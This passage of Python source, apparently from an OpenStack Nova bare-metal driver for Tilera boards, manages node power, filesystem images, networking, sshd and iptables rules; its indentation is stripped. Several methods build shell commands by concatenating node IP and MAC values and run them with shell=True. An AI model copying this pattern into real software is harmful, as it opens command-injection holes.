elif field == 'cpu_info':
return node['cpu_info']
def set_status(self, node_id, status):
"""
Sets status of the given node by the given status.
Returns 1 if the node is in the nodes list.
"""
for node in self.nodes:
if node['node_id'] == node_id:
node['status'] = status
return True
return False
def get_status(self):
"""
Gets status of the given node.
"""
pass
def get_idle_node(self):
"""
        Gets an idle node, sets its status to 1 (RUNNING) and returns the node ID.
"""
for item in self.nodes:
if item['status'] == 0:
item['status'] = 1 # make status RUNNING
return item['node_id']
raise exception.NotFound("No free nodes available")
def get_ip_by_id(self, id):
"""
Returns default IP address of the given node.
"""
for item in self.nodes:
if item['node_id'] == id:
return item['ip_addr']
def free_node(self, node_id):
"""
Sets/frees status of the given node as 0 (IDLE).
"""
LOG.debug(_("free_node...."))
for item in self.nodes:
if item['node_id'] == str(node_id):
item['status'] = 0 # make status IDLE
def power_mgr(self, node_id, mode):
"""
Changes power state of the given node.
According to the mode (1-ON, 2-OFF, 3-REBOOT), power state can be
changed. /tftpboot/pdu_mgr script handles power management of
PDU (Power Distribution Unit).
"""
if node_id < 5:
pdu_num = 1
pdu_outlet_num = node_id + 5
else:
pdu_num = 2
pdu_outlet_num = node_id
path1 = "10.0.100." + str(pdu_num)
utils.execute('/tftpboot/pdu_mgr', path1, str(pdu_outlet_num),
str(mode), '>>', 'pdu_output')
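    # Illustrative note, not part of the original Nova source: for example,
    # power_mgr(3, 1) addresses PDU 1 (10.0.100.1), outlet 8, with mode 1
    # (power on); modes are 1-ON, 2-OFF, 3-REBOOT as the docstring describes.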
def deactivate_node(self, node_id):
"""
        Deactivates the given node by turning it off.
        /tftpboot/fs_x directory is an NFS share of node#x
        and /tftpboot/root_x file is a file system image of node#x.
"""
node_ip = self.get_ip_by_id(node_id)
LOG.debug(_("deactivate_node is called for "
"node_id = %(id)s node_ip = %(ip)s"),
{'id': str(node_id), 'ip': node_ip})
for item in self.nodes:
if item['node_id'] == node_id:
LOG.debug(_("status of node is set to 0"))
item['status'] = 0
self.power_mgr(node_id, 2)
self.sleep_mgr(5)
path = "/tftpboot/fs_" + str(node_id)
pathx = "/tftpboot/root_" + str(node_id)
utils.execute('sudo', '/usr/sbin/rpc.mountd')
try:
utils.execute('sudo', 'umount', '-f', pathx)
utils.execute('sudo', 'rm', '-f', pathx)
except Exception:
LOG.debug(_("rootfs is already removed"))
def network_set(self, node_ip, mac_address, ip_address):
"""
Sets network configuration based on the given ip and mac address.
User can access the bare-metal node using ssh.
"""
cmd = (FLAGS.tile_monitor +
" --resume --net " + node_ip + " --run - " +
"ifconfig xgbe0 hw ether " + mac_address +
" - --wait --run - ifconfig xgbe0 " + ip_address +
" - --wait --quit")
subprocess.Popen(cmd, shell=True)
#utils.execute(cmd, shell=True)
self.sleep_mgr(5)
def iptables_set(self, node_ip, user_data):
"""
Sets security setting (iptables:port) if needed.
iptables -A INPUT -p tcp ! -s $IP --dport $PORT -j DROP
/tftpboot/iptables_rule script sets iptables rule on the given node.
"""
if user_data != '':
open_ip = base64.b64decode(user_data)
utils.execute('/tftpboot/iptables_rule', node_ip, open_ip)
def check_activated(self, node_id, node_ip):
"""
Checks whether the given node is activated or not.
"""
LOG.debug(_("Before ping to the bare-metal node"))
tile_output = "/tftpboot/tile_output_" + str(node_id)
grep_cmd = ("ping -c1 " + node_ip + " | grep Unreachable > " +
tile_output)
subprocess.Popen(grep_cmd, shell=True)
self.sleep_mgr(5)
file = open(tile_output, "r")
out_msg = file.readline().find("Unreachable")
utils.execute('sudo', 'rm', tile_output)
if out_msg == -1:
LOG.debug(_("TILERA_BOARD_#%(node_id)s %(node_ip)s is ready"),
locals())
return True
else:
LOG.debug(_("TILERA_BOARD_#%(node_id)s %(node_ip)s is not ready,"
" out_msg=%(out_msg)s"), locals())
self.power_mgr(node_id, 2)
return False
def vmlinux_set(self, node_id, mode):
"""
Sets kernel into default path (/tftpboot) if needed.
From basepath to /tftpboot, kernel is set based on the given mode
such as 0-NoSet, 1-SetVmlinux, or 9-RemoveVmlinux.
"""
LOG.debug(_("Noting to do for tilera nodes: vmlinux is in CF"))
def sleep_mgr(self, time_in_seconds):
"""
        Sleeps for the given number of seconds (e.g. while waiting for the node to activate).
"""
time.sleep(time_in_seconds)
def ssh_set(self, node_ip):
"""
Sets and Runs sshd in the node.
"""
cmd = (FLAGS.tile_monitor +
" --resume --net " + node_ip + " --run - " +
"/usr/sbin/sshd - --wait --quit")
subprocess.Popen(cmd, shell=True)
self.sleep_mgr(5)
def activate_node(self, node_id, node_ip, name, mac_address,
ip_address, user_data):
"""
Activates the given node using ID, IP, and MAC address.
"""
LOG.debug(_("activate_node"))
self.power_mgr(node_id, 2)
self.power_mgr(node_id, 3)
self.sleep_mgr(100)
try:
self.check_activated(node_id, node_ip)
self.network_set(node_ip, mac_address, ip_address)
self.ssh_set(node_ip)
self.iptables_set(node_ip, user_data)
return power_state.RUNNING
except Exception as ex:
self.deactivate_node(node_id)
raise exception.NovaException(_("Node is unknown error state."))
def get_console_output(self, console_log, node_id):
"""
Gets console output of the given node.
"""
node_ip = self.get_ip_by_id(node_id)
log_path = "/tftpboot/log_" + str(node_id)
kmsg_cmd = (FLAGS.tile_monitor +
" --resume --net " + node_ip +
" -- dmesg > " + log_path)
subprocess.Popen(kmsg_cmd, shell=True)
self.sleep_mgr(5)
utils.execute('cp', log_path, console_log)
def get_image(self, bp):
"""
Gets the bare-metal file system image into the instance path.
        Nothing to do for tilera nodes: the actual image is used.
"""
path_fs = "/tftpboot/tilera_fs"
path_root = bp + "/root"
utils.execute('cp', path_fs, path_root)
def set_image(self, bpath, node_id):
"""
Sets the PXE bare-metal file system from the instance path.
This should be done after ssh key is injected.
        /tftpboot/fs_x directory is an NFS share of node#x.
        /tftpboot/root_x file is a file system image of node#x.
"""
path1 = bpath + "/root"
pathx = "/tftpboot/root_" + str(node_id)
path2 = "/tftpboot/fs_" + str(node_id)
utils.execute('sudo', 'mv', path1, pathx)
utils.execute('sudo', 'mount', '-o', 'loop', pathx, path2)
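# Illustrative sketch, not part of the original Nova source: a typical driver
# flow against this backend might look like
#     nodes = get_baremetal_nodes()
#     node_id = nodes.get_idle_node()
#     node_ip = nodes.get_ip_by_id(node_id)
#     nodes.activate_node(node_id, node_ip, 'instance-1', mac, ip, user_data)
#     ...
#     nodes.deactivate_node(node_id)
# where mac, ip and user_data are supplied by the compute manager.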
| apache-2.0 | 6,158,067,869,919,608,000 | 33.627397 | 78 | 0.544505 | false |